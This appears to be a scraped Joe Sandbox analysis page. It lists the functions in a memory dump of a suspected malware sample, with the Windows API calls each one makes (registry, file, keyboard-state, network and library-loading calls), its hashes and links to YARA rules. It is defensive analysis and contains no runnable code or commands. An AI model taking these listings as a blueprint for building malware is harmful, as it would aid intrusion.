Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: Process$CloseCountersCurrentHandleOpen
String ID:
API String ID: 3488606520-0
Opcode ID: 7e7e3e24591d14774c2fce88006e6957b0f73603c0ee12c1268ebe722675c174
Instruction ID: f07c55973519dee45e7b9fa6a717c207bfad542fd6f2c97bb3b713fc596ea70d
Opcode Fuzzy Hash: 7e7e3e24591d14774c2fce88006e6957b0f73603c0ee12c1268ebe722675c174
Instruction Fuzzy Hash: 6FA1AE71604301AFD724DF28D886F2AB7E5AF98714F14885DF59A9B392D7B0EC418B82

Function 0022E3FB Relevance: 7.7, APIs: 5, Instructions: 167filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0022DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0022CF22,?), ref: 0022DDFD

Part of subcall function 0022DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0022CF22,?), ref: 0022DE16

Part of subcall function 0022E199: GetFileAttributesW.KERNEL32(?,0022CF95), ref: 0022E19A

lstrcmpiW.KERNEL32(?,?), ref: 0022E473
MoveFileW.KERNEL32(?,?), ref: 0022E4AC
_wcslen.LIBCMT ref: 0022E5EB
_wcslen.LIBCMT ref: 0022E603
SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 0022E650

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
String ID:
API String ID: 3183298772-0
Opcode ID: ecfc93a2d8e852d90f1ea5899c48ba27658faf6ed5a8be62144559c1063b0483
Instruction ID: 80aa2a836f83797419189de732d1be098dd29401997c9849b249f73e68bdd5f6
Opcode Fuzzy Hash: ecfc93a2d8e852d90f1ea5899c48ba27658faf6ed5a8be62144559c1063b0483
Instruction Fuzzy Hash: FA5193B24187956BCB24EF90E8819DF73DCAF94340F00092EF689D3151EF74A598CB6A

Function 0024B9C9 Relevance: 7.7, APIs: 5, Instructions: 167registryCOMMON

Download Yara Rule

APIs

Part of subcall function 001C9CB3: _wcslen.LIBCMT ref: 001C9CBD

Part of subcall function 0024C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0024B6AE,?,?), ref: 0024C9B5
Part of subcall function 0024C998: _wcslen.LIBCMT ref: 0024C9F1
Part of subcall function 0024C998: _wcslen.LIBCMT ref: 0024CA68
Part of subcall function 0024C998: _wcslen.LIBCMT ref: 0024CA9E

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0024BAA5
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0024BB00
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 0024BB63
RegCloseKey.ADVAPI32(?,?), ref: 0024BBA6
RegCloseKey.ADVAPI32(00000000), ref: 0024BBB3

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
String ID:
API String ID: 826366716-0
Opcode ID: 5427d4ab9134859d1a7bd4872c97bf7d8c442d620c2ccdd03635f61b731757bf
Instruction ID: bd356f225e956c214dd8e26b73dd2ef7a1d1b01b51ac8019f0b07dcd462ce483
Opcode Fuzzy Hash: 5427d4ab9134859d1a7bd4872c97bf7d8c442d620c2ccdd03635f61b731757bf
Instruction Fuzzy Hash: AF61BF31218201AFC719DF24C895F2ABBE5FF94308F54895CF4998B2A2DB31ED55CB92

Function 00228BB0 Relevance: 7.7, APIs: 5, Instructions: 159COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00228BCD
VariantClear.OLEAUT32 ref: 00228C3E
VariantClear.OLEAUT32 ref: 00228C9D
VariantClear.OLEAUT32(?), ref: 00228D10
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00228D3B

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType
String ID:
API String ID: 4136290138-0
Opcode ID: 4c4d346536ff6ddfc4b0b1b2db5b60d20be667506b197feb98849f4394ea9a11
Instruction ID: e6a4480110c63785eb398a8a5bb87de97401d838c045709c0c85054b39ff8a64
Opcode Fuzzy Hash: 4c4d346536ff6ddfc4b0b1b2db5b60d20be667506b197feb98849f4394ea9a11
Instruction Fuzzy Hash: 91516AB5A11219EFDB14CF68D884AAAB7F8FF89310B158569F905DB350E730E921CB90

Function 00238AFB Relevance: 7.6, APIs: 5, Instructions: 143COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00238BAE
GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00238BDA
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00238C32
WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00238C57
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00238C5F

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String
String ID:
API String ID: 2832842796-0
Opcode ID: f3780e34d9568f98ca62ff3e4da676bb31f9b08657f7804087ed820cf3ba76e5
Instruction ID: 7f31ac3761099adaae747227659a9249dd13f360960b13c5b6cc7404ccba6bda
Opcode Fuzzy Hash: f3780e34d9568f98ca62ff3e4da676bb31f9b08657f7804087ed820cf3ba76e5
Instruction Fuzzy Hash: D1514975A002159FCB04DF64C885E69BBF5FF58314F088459E849AB3A2DB31ED51CF90

Function 00248EE4 Relevance: 7.6, APIs: 5, Instructions: 143libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(?,00000000,?), ref: 00248F40
GetProcAddress.KERNEL32(00000000,?), ref: 00248FD0
GetProcAddress.KERNEL32(00000000,00000000), ref: 00248FEC
GetProcAddress.KERNEL32(00000000,?), ref: 00249032
FreeLibrary.KERNEL32(00000000), ref: 00249052

Part of subcall function 001DF6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00231043,?,753CE610), ref: 001DF6E6
Part of subcall function 001DF6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,0021FA64,00000000,00000000,?,?,00231043,?,753CE610,?,0021FA64), ref: 001DF70D

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
String ID:
API String ID: 666041331-0
Opcode ID: cd78b788c3f5d99d8ab4541739f835cf4bc5c2d292ea1688b471a4f328d72b25
Instruction ID: 33bdc33d1fdf8a061eb7c591f8cdebc9af2f168429121fbc56847b79ded2b867
Opcode Fuzzy Hash: cd78b788c3f5d99d8ab4541739f835cf4bc5c2d292ea1688b471a4f328d72b25
Instruction Fuzzy Hash: 36517A35614205DFC714DF68C484DADBBF1FF69314B5580A8E80A9B762DB31ED86CB90

Function 00256B76 Relevance: 7.6, APIs: 5, Instructions: 131windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(00000002,000000F0,?), ref: 00256C33
SetWindowLongW.USER32(?,000000EC,?), ref: 00256C4A
SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00256C73
ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,0023AB79,00000000,00000000), ref: 00256C98
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00256CC7

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: Window$Long$MessageSendShow
String ID:
API String ID: 3688381893-0
Opcode ID: cf091300ed512daee8067475e1b068f83125819cabc3ccf7267d6a843b65a794
Instruction ID: a3c7f8a7beb50320948bab4a6e52ba0e758f6646dc8fd7a8d3e728c9ec746821
Opcode Fuzzy Hash: cf091300ed512daee8067475e1b068f83125819cabc3ccf7267d6a843b65a794
Instruction Fuzzy Hash: 68411B35624205AFD724CF68CC5CFB97BA5EB09362F940229FC95A72E0D371ED64CA48

Function 001F2051 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 001F20C3
_free.LIBCMT ref: 001F20E3

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: f4e2aa88d4e0574ce4433acebe61a556041aa9b8079852eaab6aebf4d5dab5e6
Instruction ID: 19a042b6a6dcd2beb3a74db86438ebc35cd95463e4deae660f2a4da9110c383d
Opcode Fuzzy Hash: f4e2aa88d4e0574ce4433acebe61a556041aa9b8079852eaab6aebf4d5dab5e6
Instruction Fuzzy Hash: 6B41D476A002089FCB24DF78C881AADB7F5EF99314F2545A9E615EB391DB31ED01CB90

Function 001D912D Relevance: 7.6, APIs: 5, Instructions: 121keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 001D9141
ScreenToClient.USER32(00000000,?), ref: 001D915E
GetAsyncKeyState.USER32(00000001), ref: 001D9183
GetAsyncKeyState.USER32(00000002), ref: 001D919D

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: 13acaad4d86cdc992faf29d04923197ebdcf83fada6ceff03ee5be5b9c9f59de
Instruction ID: 247e82d0734d7c5a024e2606eefa789bf1e7388cf18de337d50f21e775473063
Opcode Fuzzy Hash: 13acaad4d86cdc992faf29d04923197ebdcf83fada6ceff03ee5be5b9c9f59de
Instruction Fuzzy Hash: 01415F7191860BFBDF199F64C848BEEB7B4FB55320F204216E429A22D0D77469A4CF91

Function 00233874 Relevance: 7.6, APIs: 5, Instructions: 101windowCOMMON

Download Yara Rule

APIs

GetInputState.USER32 ref: 002338CB
TranslateAcceleratorW.USER32(?,00000000,?), ref: 00233922
TranslateMessage.USER32(?), ref: 0023394B
DispatchMessageW.USER32(?), ref: 00233955
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00233966

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: Message$Translate$AcceleratorDispatchInputPeekState
String ID:
API String ID: 2256411358-0
Opcode ID: cf8751382f68c03e4ccbdc484806d2f3a0dfbe7696c413543167a4a51fc6bc8c
Instruction ID: c575aefcba9e02400868a35cfcfa4e8f297f89da694805fd8b8f2cb6e7cb5aae
Opcode Fuzzy Hash: cf8751382f68c03e4ccbdc484806d2f3a0dfbe7696c413543167a4a51fc6bc8c
Instruction Fuzzy Hash: EA31B2B0928343DEEB35CF75A84DBB637A8EB05305F14056EE462C61A0E7F49BA5CB11

Function 0023CF1A Relevance: 7.6, APIs: 5, Instructions: 93networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,0023C21E,00000000), ref: 0023CF38
InternetReadFile.WININET(?,00000000,?,?), ref: 0023CF6F
GetLastError.KERNEL32(?,00000000,?,?,?,0023C21E,00000000), ref: 0023CFB4
SetEvent.KERNEL32(?,?,00000000,?,?,?,0023C21E,00000000), ref: 0023CFC8
SetEvent.KERNEL32(?,?,00000000,?,?,?,0023C21E,00000000), ref: 0023CFF2

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: EventInternet$AvailableDataErrorFileLastQueryRead
String ID:
API String ID: 3191363074-0
Opcode ID: b3445a91c94abe8c1e6d3aad7d8dbffdd8325b842b1e77e4dd03236c17a9c0b4
Instruction ID: 3ab12a174a3709d115fa27013738427643cc9d355cf72fa29f7f179932fd03be
Opcode Fuzzy Hash: b3445a91c94abe8c1e6d3aad7d8dbffdd8325b842b1e77e4dd03236c17a9c0b4
Instruction Fuzzy Hash: 1D317FB1510706AFDB20DFA5D884AABBBF9EB14311F20442FF506E2511E730EE51DB60

Function 00221901 Relevance: 7.6, APIs: 5, Instructions: 93sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00221915
PostMessageW.USER32(00000001,00000201,00000001), ref: 002219C1
Sleep.KERNEL32(00000000,?,?,?), ref: 002219C9
PostMessageW.USER32(00000001,00000202,00000000), ref: 002219DA
Sleep.KERNEL32(00000000,?,?,?,?), ref: 002219E2

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: 1c6f37c15467f7c6cfe57dbc135f73760f9f91b55d9471271849e8060f5368f7
Instruction ID: 5ae5edf6fbb98cdcbbe4003eaf522ab3c9a07f1513447deecc05a8b3295f0cd0
Opcode Fuzzy Hash: 1c6f37c15467f7c6cfe57dbc135f73760f9f91b55d9471271849e8060f5368f7
Instruction Fuzzy Hash: D531D171910229EFCB04CFA8ED99EDE3BB5EB54315F104225F921A72D0D7709AA4CB90

Function 00255706 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001053,000000FF,?), ref: 00255745
SendMessageW.USER32(?,00001074,?,00000001), ref: 0025579D
_wcslen.LIBCMT ref: 002557AF
_wcslen.LIBCMT ref: 002557BA
SendMessageW.USER32(?,00001002,00000000,?), ref: 00255816

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: MessageSend$_wcslen
String ID:
API String ID: 763830540-0
Opcode ID: 6f1eefb0b637d5fcec3b18f112b4f75193a683a65a43ee3fcfcb483aa73aacc5
Instruction ID: 6002edadea877458de6aed875dbdc676e1d4a6df9081da946f3a183c4e9b3296
Opcode Fuzzy Hash: 6f1eefb0b637d5fcec3b18f112b4f75193a683a65a43ee3fcfcb483aa73aacc5
Instruction Fuzzy Hash: 5F21A531924629DBDB208FA1DC84AEDB7BCFF44326F108216FD19EA180D7708A99CF54

Function 00240930 Relevance: 7.6, APIs: 5, Instructions: 69COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 00240951
GetForegroundWindow.USER32 ref: 00240968
GetDC.USER32(00000000), ref: 002409A4
GetPixel.GDI32(00000000,?,00000003), ref: 002409B0
ReleaseDC.USER32(00000000,00000003), ref: 002409E8

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: Window$ForegroundPixelRelease
String ID:
API String ID: 4156661090-0
Opcode ID: ca51f87acb265395cf9a42cffd4944c3d3fb49bb09ff28c9a0c921e0438f7103
Instruction ID: 3ecfca3c4c54346bf11ca41def619fc798155af6cb79b205491e66740cec8d83
Opcode Fuzzy Hash: ca51f87acb265395cf9a42cffd4944c3d3fb49bb09ff28c9a0c921e0438f7103
Instruction Fuzzy Hash: 8721A175610214AFD704EF64D889AAEBBE9EF58B01F10842CE94AD7352DB30ED44CB50

Function 001FCDBD Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 001FCDC6
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 001FCDE9

Part of subcall function 001F3820: RtlAllocateHeap.NTDLL(00000000,?,00291444,?,001DFDF5,?,?,001CA976,00000010,00291440,001C13FC,?,001C13C6,?,001C1129), ref: 001F3852

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 001FCE0F
_free.LIBCMT ref: 001FCE22
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 001FCE31

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: 496e51a78573e1578a83d204c6c237f7e578d0fa4ea5a0f883a472e4a56fe54c
Instruction ID: 3c3deb135967bfa39a3c9da4ffd3a2d6cbffa50a1be6e9ab8e304e0186a9be01
Opcode Fuzzy Hash: 496e51a78573e1578a83d204c6c237f7e578d0fa4ea5a0f883a472e4a56fe54c
Instruction Fuzzy Hash: 78018472A0171D7F232116B66D8CDBB6D6DEEC6BA13254129FA05C7202EB718D01A1F4

Function 001D9639 Relevance: 7.6, APIs: 5, Instructions: 66COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 001D9693
SelectObject.GDI32(?,00000000), ref: 001D96A2
BeginPath.GDI32(?), ref: 001D96B9
SelectObject.GDI32(?,00000000), ref: 001D96E2

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: 9e1de34f1a3dcf8282f97a83d8f7d330b1570a85ef39407f0378054da4ba68ca
Instruction ID: e4a6ba5beb32ec6c64d5aa9c311a0777ec94a008978409e27b7060d7b95e1f7e
Opcode Fuzzy Hash: 9e1de34f1a3dcf8282f97a83d8f7d330b1570a85ef39407f0378054da4ba68ca
Instruction Fuzzy Hash: 33215E70802346EFEB119F66FC1C7A97BB8BB50366F204217F415A62B0D37098A5CF94

Function 00225711 Relevance: 7.6, APIs: 5, Instructions: 61COMMON

Download Yara Rule

APIs

_memcmp.LIBVCRUNTIME ref: 00225726
_memcmp.LIBVCRUNTIME ref: 00225744
_memcmp.LIBVCRUNTIME ref: 00225757
_memcmp.LIBVCRUNTIME ref: 0022576F
_memcmp.LIBVCRUNTIME ref: 00225787

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: 381bf7afbfe4eb63fe7e42192c664304a765578427c85f04a52394277add7e93
Instruction ID: 56e44ea77515000ff982094f240f7f1af057304ed2e14890a7baf043193987e2
Opcode Fuzzy Hash: 381bf7afbfe4eb63fe7e42192c664304a765578427c85f04a52394277add7e93
Instruction Fuzzy Hash: 930196716E1A75BA92189551AE42FBBB35DAB353A5B048031FD049E241F770ED3482A4

Function 001F2DF8 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,001EF2DE,001F3863,00291444,?,001DFDF5,?,?,001CA976,00000010,00291440,001C13FC,?,001C13C6), ref: 001F2DFD
_free.LIBCMT ref: 001F2E32
_free.LIBCMT ref: 001F2E59
SetLastError.KERNEL32(00000000,001C1129), ref: 001F2E66
